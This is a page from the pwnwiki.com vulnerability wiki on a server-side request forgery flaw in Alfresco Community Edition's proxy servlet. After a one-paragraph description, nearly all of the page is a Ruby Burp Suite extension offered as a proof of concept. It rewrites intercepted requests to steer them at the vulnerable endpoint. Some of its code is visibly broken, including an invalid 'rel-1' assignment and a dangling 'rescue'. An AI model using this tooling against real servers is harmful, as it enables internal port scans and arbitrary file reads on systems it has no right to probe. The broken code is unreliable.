pwnwiki.com
,
INFO
Server-side request forgery (SSRF) vulnerability in the proxy servlet in Alfresco Community Edition before 5.0.a allows remote attackers to trigger outbound requests to intranet servers, conduct port scans, and read arbitrary files via a crafted URI in the endpoint parameter.
POC
require 'java'
java_import 'burp.IBurpExtender'
java_import 'burp.IHttpListener'
java_import 'burp.IMessageEditorController'
class BurpExtender
include IBurpExtender, IHttpListener, IMessageEditorController
#
# implement IBurpExtender
#
def registerExtenderCallbacks(callbacks)
#@HOST_FROM = 'host1.example.org'
#@HOST_TO = 'host2.example.org'
# obtain an extension helpers object
@helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("Traffic redirector")
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
end
#
# implement IHttpListener
#
def processHttpMessage(toolFlag, messageIsRequest, messageInfo)
# only process requests
if (messageIsRequest)
# get the HTTP service for the request
httpService = messageInfo.getHttpService()
request = messageInfo.getRequest()
@root_path = nil unless request.to_s.lines.first.index('endpoint').nil?
referer = request.to_s.scan(/Referer: (.*)/)
referer.flatten!
referer =referer.first.scan(/(\/alfresco\/.*:\d+\/)(.*)/) rescue
root_path = referer.flatten.first
relative_path = "/#{referer.flatten.last}"
if @root_path.nil? || @root_path.to_s != root_path
@root_path =root_path unless root_path.nil?
@relative_path = relative_path unless root_path.nil?
end
puts "INSTANCE_ROOT_PATH: #{@root_path}"
puts "Instance Relative_PATH: #{@relative_path}"
puts "ROOT_PATH: #{root_path}"
puts "Relative_PATH: #{relative_path}"
puts request.to_s.lines.first
new_req = request.to_s.sub("/alfresco/","/")
new_req = request if new_req.nil?
if new_req.to_s.lines.first.count('/')<3
print "Single dash "
puts new_req.to_s.lines.first
unless root_path == relative_path
rel = @relative_path.split("/")
rel-1 = ""
new_req = new_req.to_s.sub("/", rel.join('/'))
end
end
new_req = new_req.to_s.sub("/", @root_path)
print "Final request "
puts new_req
messageInfo.setRequest(
@helpers.stringToBytes(new_req)
)
# if the host is HOST_FROM, change it to HOST_TO
#if (@HOST_FROM == httpService.getHost())
# messageInfo.setHttpService(
# @helpers.buildHttpService(
# @HOST_TO,
# httpService.getPort(),
# httpService.getProtocol()
# )
# )
#end
end
ensure
puts '----------------------'
end
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService()
return @currentlyDisplayedItem.getHttpService()
end
def getRequest()
return @currentlyDisplayedItem.getRequest()
end
def getResponse()
return @currentlyDisplayedItem.getResponse()
end
#
# getter / setters
#
def callbacks
@callbacks
end
def log
@log
end
def requestViewer
@requestViewer
end
def responseViewer
@responseViewer
end
def currentlyDisplayedItem=(currentlyDisplayedItem)
@currentlyDisplayedItem = currentlyDisplayedItem
end
end
免费、自由、人人可编辑的漏洞库--pwnwiki.com
